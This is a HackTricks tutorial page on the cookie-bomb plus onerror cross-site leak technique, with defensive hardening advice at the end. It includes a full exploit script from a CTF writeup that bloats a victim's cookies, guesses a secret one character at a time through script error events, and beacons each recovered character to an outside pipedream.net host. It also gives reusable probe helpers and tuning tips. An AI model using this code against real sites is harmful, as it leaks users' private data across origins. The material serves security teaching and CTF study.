HackTricksCookie Bomb + Onerror XS Leak
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
This technique combines:
- Cookie bombing: stuffing the victimās browser with many/large cookies for the target origin so that subsequent requests hit server/request limits (request header size, URL size in redirects, etc.).
- Error-event oracle: probing a cross-origin endpoint with a
High level idea
- Find a target endpoint whose behavior differs for two states you want to test (e.g., search āhitā vs āmissā).
- Ensure the āhitā path will trigger a heavy redirect chain or long URL while the āmissā path stays short. Inflate request headers using many cookies so that only the āhitā path causes the server to fail with an HTTP error (e.g., 431/414/400). The error flips the onerror event and becomes an oracle for XS-Search.
When does this work
- You can cause the victim browser to send cookies to the target (e.g., cookies are SameSite=None or you can set them in a first-party context via a popup window.open).
- There is an app feature you can abuse to set arbitrary cookies (e.g., āsave preferenceā endpoints that turn controlled input names/values into Set-Cookie) or to make post-auth redirects that incorporate attacker-controlled data into the URL.
- The server reacts differently on the two states and, with inflated headers/URL, one state crosses a limit and returns an error response that triggers onerror.
Note on server errors used as the oracle
- 431 Request Header Fields Too Large is commonly returned when cookies inflate request headers; 414 URI Too Long or a server-specific 400 may be returned for long request targets. Any of these result in a failed subresource load and fire onerror. MDN documents 431 and typical causes like excessive cookies.
Practical example (angstromCTF 2022) The following script (from a public writeup) abuses a feature that lets the attacker insert arbitrary cookies, then loads a cross-origin search endpoint as a script. When the query is correct, the server performs a redirect that, together with the cookie bloat, exceeds server limits and returns an error status, so script.onerror fires; otherwise nothing happens.
<>'";
<form action="https://sustenance.web.actf.co/s" method="POST">
<input id="f" /><input name="search" value="a" />
</form>
<script>
const $ = document.querySelector.bind(document)
const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
let i = 0
const stuff = async (len = 3500) => {
let name = Math.random()
$("form").target = name
let w = window.open("", name)
$("#f").value = "_".repeat(len)
$("#f").name = i++
$("form").submit()
await sleep(100)
}
const isError = async (url) => {
return new Promise((r) => {
let script = document.createElement("script")
script.src = url
script.onload = () => r(false)
script.onerror = () => r(true)
document.head.appendChild(script)
})
}
const search = (query) => {
return isError(
"https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
)
}
const alphabet =
"etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
const url = "//en4u1nbmyeahu.x.pipedream.net/"
let known = "actf{"
window.onload = async () => {
navigator.sendBeacon(url + "?load")
await Promise.all([stuff(), stuff(), stuff(), stuff()])
await stuff(1600)
navigator.sendBeacon(url + "?go")
while (true) {
for (let c of alphabet) {
let query = known + c
if (await search(query)) {
navigator.sendBeacon(url, query)
known += c
break
}
}
}
}
</script>
Why the popup (window.open)?
- Modern browsers increasingly block third-party cookies. Opening a top-level window to the target makes cookies firstāparty so Set-Cookie responses from the target will stick, enabling the cookie-bomb step even with thirdāparty cookie restrictions.
2024ā2025 notes on cookie availability
- Chromium-based browsers still commonly send thirdāparty cookies unless the user or site opts out, but Safari and Firefox block most thirdāparty cookies by default. Plan for both: (1) use a firstāparty cookie planting flow (window.open + auto-submit to a cookie-setting endpoint) and then (2) probe with a subresource that only succeeds when those cookies are sent. If thirdāparty cookies are blocked, move the probe into a same-site context (e.g., run the oracle in the popup via a same-site gadget and exfiltrate the boolean with postMessage or a beacon to your server).
Generic probing helper If you already have a way to set many cookies on the target origin (first-party), you can reuse this minimal oracle against any endpoint whose success/failure leads to different network outcomes (status/MIME/redirect):
function probeError(url) {
return new Promise((resolve) => {
const s = document.createElement('script');
s.src = url;
s.onload = () => resolve(false); // loaded successfully
s.onerror = () => resolve(true); // failed (e.g., 4xx/5xx, wrong MIME, blocked)
document.head.appendChild(s);
});
}
Alternative tag oracle (stylesheet)
function probeCSS(url) {
return new Promise((resolve) => {
const l = document.createElement('link');
l.rel = 'stylesheet';
l.href = url;
l.onload = () => resolve(false);
l.onerror = () => resolve(true);
document.head.appendChild(l);
});
}
Advanced: de Bruijnābased cookie packing (CTF-proven)
- When the app lets you control large cookie values, you can pack guesses efficiently by appending a de Bruijn sequence to each probe. This keeps perāprobe overhead small while ensuring the heavy branch is consistently heavier only for the right prefix. Example generator for |Ī£| symbols of length n (fits in a cookie value):
const ALPH = '_{}0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
function deBruijn(k, n, alphabet=ALPH){
const a = Array(k * n).fill(0), seq=[];
(function db(t,p){
if(t>n){ if(n%p===0) for(let j=1;j<=p;j++) seq.push(a[j]); }
else { a[t]=a[t-p]; db(t+1,p); for(let j=a[t-p]+1;j<k;j++){ a[t]=j; db(t+1,t);} }
})(1,1);
return seq.map(i=>alphabet[i]).join('');
}
- Idea in practice: set multiple cookies whose values are prefix + deBruijn(k,n). Only when the tested prefix is correct does the server take the heavy path (e.g., extra redirect reflecting the long cookie or URL), which, combined with the cookie bloat, crosses limits and flips onerror. See a LA CTF 2024 public solver using this approach.
Tips to build the oracle
- Force the āpositiveā state to be heavier: chain an extra redirect only when the predicate is true, or make the redirect URL reflect unbounded user input so it grows with the guessed prefix.
- Inflate headers: repeat cookie bombing until a consistent error is observed on the āheavyā path. Servers commonly cap header size and will fail sooner when many cookies are present.
- Stabilize: fire multiple parallel cookie set operations and probe repeatedly to average out timing and caching noise.
- Bust caches and avoid pooling artifacts: add a random
#fragmentor?r=to probe URLs, and prefer distinct window names when using window.open loops. - Alternate subresources: if
<script>is filtered, try<link rel=stylesheet>or<img>. The onload/onerror boolean is the oracle; content never needs to be parsed.
Common header/URL limits (useful thresholds)
- Reverse proxies/CDNs and servers enforce different caps. As of October 2025, Cloudflare documents 128 KB total for request headers (and 16 KB URL) on the edge, so you may need more/larger cookies when targets sit behind it. Other stacks (e.g., Apache via LimitRequestFieldSize) are often closer to ~8 KB per header line and will hit errors earlier. Adjust bomb size accordingly. [Cloudflare docs show the 128 KB header limit.]
Related XS-Search tricks
- URL length based oracles (no cookies needed) can be combined or used instead when you can force a very long request target:
Defenses and hardening
- Make success/failure responses indistinguishable:
- Avoid conditional redirects or large differences in response size between states. Return the same status, same content type, and similar body length regardless of state.
- Block cross-site subresource probes:
- SameSite cookies: set sensitive cookies to SameSite=Lax or Strict so subresource requests like
- Fetch Metadata: enforce a Resource Isolation Policy to reject cross-site subresource loads (e.g., if Sec-Fetch-Site != same-origin/same-site).
- Cross-Origin-Resource-Policy (CORP): set CORP: same-origin (or at least same-site) for endpoints not meant to be embedded as cross-origin subresources.
- X-Content-Type-Options: nosniff and correct Content-Type on JSON/HTML endpoints to avoid load-as-script quirks.
- Reduce header/URL amplification:
- Cap the number/size of cookies set; sanitize features that turn arbitrary form fields into Set-Cookie.
- Normalize or truncate reflected data in redirects; avoid embedding attacker-controlled long strings in Location URLs.
- Keep server limits consistent and fail uniformly (avoid special error pages only for one branch).
Notes
- This class of attacks is discussed broadly as āError Eventsā XS-Leaks. The cookie-bomb step is just a convenient way to push only one branch over server limits, producing a reliable boolean oracle.
References
- XS-Leaks: Error Events (onerror/onload as an oracle): https://xsleaks.dev/docs/attacks/error-events/
- MDN: 431 Request Header Fields Too Large (common with many cookies): https://developer.mozilla.org/en-US/docs/Web/HTTP/Status/431
- LA CTF 2024 writeup note showing a de Bruijn cookie-bomb oracle: https://gist.github.com/arkark/5787676037003362131f30ca7c753627
- Cloudflare edge limits (URLs 16 KB, request headers 128 KB): https://developers.cloudflare.com/fundamentals/reference/connection-limits/
Tip
Learn & practice AWS Hacking:
Learn & practice GCP Hacking:
Learn & practice Az Hacking:Support HackTricks
- Check the subscription plans!
- Join the š¬ Discord group or the telegram group or follow us on Twitter š¦ @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.